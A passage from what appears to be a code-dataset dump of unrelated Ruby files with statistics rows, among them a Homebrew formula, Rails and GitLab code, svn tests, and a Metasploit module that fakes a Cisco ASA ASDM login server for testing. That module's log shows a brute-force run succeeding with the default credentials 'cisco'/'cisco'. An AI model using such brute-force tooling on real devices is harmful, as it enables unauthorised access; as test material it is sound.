rescue Exception => e # rubocop:disable Lint/RescueException
Log.error("Failed to load #{klass}: #{e}")
raise unless squash_failures
end
# Grep's over the plugin list and returns the list found
def self.grep(regex)
@plugins.keys.grep(regex)
end
end
end
| 33.801136 | 108 | 0.635569 |
18f2648bd60f36fb31b702d75ebb7ab67569d165 | 4,248 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Basic HttpServer Simulator',
'Description' => %q{
This is example of a basic HttpServer simulator, good for PR scenarios when a module
is made, but the author no longer has access to the test box, no pcap or screenshot -
Basically no way to prove the functionality.
This particular simulator will pretend to act like a Cisco ASA ASDM, so the
cisco_asa_asdm.rb module can do a live test against it.
},
'References' =>
[
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2720' ],
],
'DefaultOptions' =>
{
'SRVPORT' => 443,
'SSL' => true,
'URIPATH' => '/'
},
'Author' => [ 'sinn3r' ],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('USERNAME', [true, "The valid default username", "cisco"]),
OptString.new('PASSWORD', [true, "The valid default password", "cisco"])
], self.class)
deregister_options('RHOST')
end
#
# Returns a response when the client is trying to check the connection
#
def res_check_conn(cli, req)
send_response(cli, '')
end
#
# Returns a response when the client is trying to authenticate
#
def res_login(cli, req)
case req.method
when 'GET'
# This must be the is_app_asdm? method asking
print_status("Responding to the is_app_asdm? method")
send_response(cli, '', {'Set-Cookie'=>'webvpn'})
when 'POST'
# This must be the do_login method. But before it can login, it must meet
# the cookie requirement
if req.headers['Cookie'] == /webvpnlogin=1; tg=0DefaultADMINGroup/
send_redirect(cli)
return
end
# Process the post data
vars_post = {}
req.body.scan(/(\w+=\w+)/).flatten.each do |param|
k, v = param.split('=')
vars_post[k] = v
end
# Auth
if vars_post['username'] == datastore['USERNAME'] and vars_post['password'] == datastore['PASSWORD']
print_good("Authenticated")
fake_success_body = %Q|
SSL VPN Service
Success
success
|
send_response(cli, fake_success_body)
else
print_error("Bad login")
resp = create_response(403, "Access Denied")
resp.body = ''
cli.send_response(resp)
end
end
end
def on_request_uri(cli, req)
print_status("Received request: #{req.uri}")
case req.uri
when '/'
res_check_conn(cli, req)
when /\+webvpn\+\/index\.html/
res_login(cli, req)
end
# Request not processed, send a 404
send_not_found(cli)
end
def run
exploit
end
end
=begin
Test Results - clinet output:
msf auxiliary(cisco_asa_asdm) > run
[+] 10.0.1.76:443 - Server is responsive...
[*] 10.0.1.76:443 - Application appears to be Cisco ASA ASDM. Module will continue.
[*] 10.0.1.76:443 - Starting login brute force...
[*] 10.0.1.76:443 - [1/2] - Trying username:"cisco" with password:""
[-] 10.0.1.76:443 - [1/2] - FAILED LOGIN - "cisco":""
[*] 10.0.1.76:443 - [2/2] - Trying username:"cisco" with password:"cisco"
[+] 10.0.1.76:443 - SUCCESSFUL LOGIN - "cisco":"cisco"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(cisco_asa_asdm) >
Test Results - Fake server output:
msf auxiliary(httpserver) > run
[*] Using URL: https://0.0.0.0:443/
[*] Local IP: https://10.0.1.76:443/
[*] Server started.
[*] 10.0.1.76 httpserver - Received request: /
[*] 10.0.1.76 httpserver - Received request: /+webvpn+/index.html
[*] 10.0.1.76 httpserver - Responding to the is_app_asdm? method
[*] 10.0.1.76 httpserver - Received request: /+webvpn+/index.html
[-] 10.0.1.76 httpserver - Bad login
[*] 10.0.1.76 httpserver - Received request: /+webvpn+/index.html
[+] Authenticated
=end
| 27.764706 | 106 | 0.610169 |
012e7c2233d07c575747ca64d3e619f9d4dc8e3c | 38 | # stub
require 'facets/string/upcase'
| 12.666667 | 30 | 0.763158 |
bf53ef50ff0d5280e7067e72c87ae15d96ed4619 | 223 | class CreateUsers < ActiveRecord::Migration[5.1]
def change
create_table :users do |t|
t.string :name
t.integer :age
t.string :astrological_sign
t.integer
t.timestamps
end
end
end
| 17.153846 | 48 | 0.636771 |
ed2e00f1241b820eff82b9527a1d807c0dd4f825 | 571 | # frozen_string_literal: true
class DeleteUserWorker # rubocop:disable Scalability/IdempotentWorker
include ApplicationWorker
feature_category :authentication_and_authorization
loggable_arguments 2
def perform(current_user_id, delete_user_id, options = {})
delete_user = User.find(delete_user_id)
current_user = User.find(current_user_id)
Users::DestroyService.new(current_user).execute(delete_user, options.symbolize_keys)
rescue Gitlab::Access::AccessDeniedError => e
Gitlab::AppLogger.warn("User could not be destroyed: #{e}")
end
end
| 31.722222 | 88 | 0.788091 |
f8e2958b3d0042272e02862fc0a277ca394274f2 | 1,954 | require File.dirname(__FILE__) + "/../../../test_helper"
class TestWorkingCopyExternals < Test::Unit::TestCase
def setup
@wcdir = Pathname.new("tmp/wc")
@wc = Piston::Svn::WorkingCopy.new(@wcdir)
end
def test_parse_empty_svn_externals
@wc.stubs(:svn).returns(EMPTY_EXTERNALS)
assert_equal({}, @wc.externals)
end
def test_parse_simple_externals
@wc.stubs(:svn).returns(SIMPLE_RAILS_EXTERNALS)
assert_equal({@wcdir + "vendor/rails" => {:revision => :head, :url => "http://dev.rubyonrails.org/svn/rails/trunk"}}, @wc.externals)
end
def test_parse_externals_with_revision
@wc.stubs(:svn).returns(VERSIONED_RAILS_EXTERNALS)
assert_equal({@wcdir + "vendor/rails" => {:revision => 8726, :url => "http://dev.rubyonrails.org/svn/rails/trunk"}}, @wc.externals)
end
def test_parse_externals_with_long_revision
@wc.stubs(:svn).returns(LONG_VERSION_RAILS_EXTERNALS)
assert_equal({@wcdir + "vendor/rails" => {:revision => 8726, :url => "http://dev.rubyonrails.org/svn/rails/trunk"}}, @wc.externals)
end
def test_remove_external_references_calls_svn_propdel
@wc.expects(:svn).with(:propdel, "svn:externals", @wcdir+"vendor")
@wc.remove_external_references(@wcdir+"vendor")
end
def test_remove_external_references_calls_svn_propdel_with_multiple_dirs
@wc.expects(:svn).with(:propdel, "svn:externals", @wcdir+"vendor", @wcdir+"vendor/plugins")
@wc.remove_external_references(@wcdir+"vendor", @wcdir+"vendor/plugins")
end
EMPTY_EXTERNALS = ""
SIMPLE_RAILS_EXTERNALS = <<EOF
Properties on 'vendor':
svn:externals : rails http://dev.rubyonrails.org/svn/rails/trunk
EOF
VERSIONED_RAILS_EXTERNALS = <<EOF
Properties on 'vendor':
svn:externals : rails -r8726 http://dev.rubyonrails.org/svn/rails/trunk
EOF
LONG_VERSION_RAILS_EXTERNALS = <<EOF
Properties on 'vendor':
svn:externals : rails --revision 8726 http://dev.rubyonrails.org/svn/rails/trunk
EOF
end
| 34.892857 | 136 | 0.723132 |
03a8d8c0ee26b07b1012ec24008d153a0e7c85da | 1,674 | class Aravis < Formula
desc "Vision library for genicam based cameras"
homepage "https://wiki.gnome.org/Projects/Aravis"
url "https://download.gnome.org/sources/aravis/0.8/aravis-0.8.6.tar.xz"
sha256 "f2460c8e44ba2e6e76f484568f7b93932040c1280131ecd715aafcba77cffdde"
license "LGPL-2.1-or-later"
bottle do
sha256 arm64_big_sur: "03957fe3eab53520827a52a153f527615cdbf07406636279891189f8b037c6fa"
sha256 big_sur: "13b501800640ac63a447119d9f82f1dabf26feeabfd119d8e559536bdb6723ec"
sha256 catalina: "21518b405685f7cf230f084570bc92b9fbf7ea116bbabd02041b4f265d2e762c"
sha256 mojave: "da90fdc84b7291acab730e63443b23c007f9f328a4a0f172bce50c054b3d76f8"
end
depends_on "gobject-introspection" => :build
depends_on "gtk-doc" => :build
depends_on "meson" => :build
depends_on "ninja" => :build
depends_on "pkg-config" => :build
depends_on "adwaita-icon-theme"
depends_on "glib"
depends_on "gst-plugins-bad"
depends_on "gst-plugins-base"
depends_on "gst-plugins-good"
depends_on "gstreamer"
depends_on "gtk+3"
depends_on "intltool"
depends_on "libnotify"
depends_on "libusb"
def install
ENV["XML_CATALOG_FILES"] = "#{etc}/xml/catalog"
mkdir "build" do
system "meson", *std_meson_args, ".."
system "ninja"
system "ninja", "install"
end
end
def post_install
system "#{Formula["gtk+3"].opt_bin}/gtk3-update-icon-cache", "-f", "-t", "#{HOMEBREW_PREFIX}/share/icons/hicolor"
end
test do
output = shell_output("gst-inspect-1.0 #{lib}/gstreamer-1.0/libgstaravis.#{version.major_minor}.dylib")
assert_match /Description *Aravis Video Source/, output
end
end
| 33.48 | 117 | 0.733572 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.